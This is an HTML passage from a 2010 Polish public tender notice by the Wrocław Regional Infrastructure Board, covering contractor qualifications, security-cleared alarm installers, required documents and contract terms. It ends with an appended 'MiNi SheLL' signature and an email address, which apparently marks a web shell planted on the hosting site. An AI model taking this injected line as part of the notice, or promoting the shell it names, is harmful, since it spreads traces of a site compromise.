</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać doświadczenie w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, że jako główny 
                       Wykonawca wykonał co najmniej:
a) jedną rozbudowę lub remont obiektu kubaturowego o konstrukcji tradycyjnej,     
    o wartości robót nie mniejszej niż 8 500 000,00 zł (brutto).
Na potwierdzenie w/w warunków należy załaczyć wykaz robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności
  jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, dat i miejsc  wykonania wraz z załączeniem dokumentów potwierdzających, że roboty zostały
  wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone
  - Formularz nr 3;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje kierownikiem budowy i kierownikami
robót, którzy posiadają uprawnienia i należą do właściwej izby samorządu
          zawodowego:
a) kierownik budowy - w zakresie konstrukcyjno - budowlanym - bez ograniczeń;
b) kierownika robót sanitarnych w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych - bez ograniczeń;
c) kierownik robót instalacyjnych w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych - bez ograniczeń;
d)  kierownik robót instalacji teletechnicznych wewnętrznych w zakresie     
wykonywania instalacji - systemów alarmowych SSWiN posiadający licencje  pracownika zabezpieczeń technicznych II stopnia wydaną przez 
        KWP, a dla instalacji systemu alarmu pożaru SAP - posiadanie autoryzacji 
        producenta na wykonywanie montażu przewidzianych do realizacji 
        urządzeń.  
Wykonawca musi wykazać, ze dysponuje pełnomocnikiem ochrony informacji niejawnych;
1.Wykonawca musi wykazać, ze dysponuje osobami zdolnymi do wykonania przedmiotu zamówienia w zakresie wykonania instalacji (SSWiN i KD), którzy
                        muszą posiadać licencje techniczne:
 a) pracownicy kierującymi robotami - licencje techniczne II stopnia,
b) pracownicy wykonujący roboty - licencje techniczne I stopnia.
Instalatorzy i projektanci systemów alarmowych powinni posiadać 
świadectwa odbycia szkolenia i autoryzacji w zakresie instalowania 
i projektowania systemów klasy SA - 4. 
	Osoby kierujące pracami wykonania systemów alarmowych powinni posiadać poświadczenie bezpieczeństwa minimum o klauzuli POUFNE. Natomiast pracownicy wykonujący prace dotyczące systemów alarmowych powinni posiadać poświadczenie bezpieczeństwa minimum o klauzuli ZASTRZEŻONE;
2.Wykonawca powinien posiadać certyfikaty lub świadectwa kwalifikacyjne 
na urządzenia alarmowe przewidziane do instalacji w obiektach wojskowych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać środki obrotowe lub zdolność kredytową, na kwotę  nie mniejszą niż 8 000 000,00 zł (brutto);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w przypadku: 
1) stwierdzenia, że w dokumentacji projektowej przekazanej przez Wykonawcę zgodnie 
z § 1 ust. 2 umowy, znajdują się błędy uniemożliwiające prawidłowe i terminowe wykonanie przedmiotu umowy - zmiana terminu wykonania umowy;
2) zmniejszenia lub zwiększenia ilości jednostek obmiarowych - w zakresie mającym wpływ na ustaloną kwotę wynagrodzenia i terminu wykonania - zmiana kwoty wynagrodzenia, zmiana terminu realizacji; 
3) obiektywie uzasadnionej konieczności wprowadzenia zmiany technologii wykonania przedmiotu umowy - zmiana ustalonego wynagrodzenia, zmiana terminu wykonania. Zmiana zakresu prac określonych w SIWZ jest możliwa tylko w zakresie niezbędnym do zgodnego a obowiązującymi standardami, wymaganiami technicznymi oraz normami prawidłowego wykonania przedmiotu umowy;
4) zaistnienie niezależnych od Wykonawcy przeszkód, działanie siły wyższej, uniemożliwiających wykonanie przedmiotu umowy w ustalonym terminie;
5) zaistnienie zdarzeń losowych powodujących konieczność zmiany przedstawiciela strony wpisanej do umowy;
6) uzasadniona nieprzewidzianymi okolicznościami zmiana zakresu robót realizowanych przy udziale podwykonawcy;
7) zmiany limitów finansowych określonych w centralnych planach rzeczowych resortu obrony narodowej - zmiana terminu realizacji przedmiotu umowy oraz zmiana wysokości limitów.
2.  Wszelkie zmiany do niniejszej umowy wymagają pod rygorem nieważności zachowania formy pisemnej w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rzi.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonowy Zarząd Infrastriktury we Wrocławiu, ul. Obornicka 126, 50-984 Wrocław,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2010 godzina 10:00, miejsce: Rejonowy Zarząd Infrastriktury we Wrocławiu, ul. Obornicka 126, 50-984 Wrocław- kancelaria pok. 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com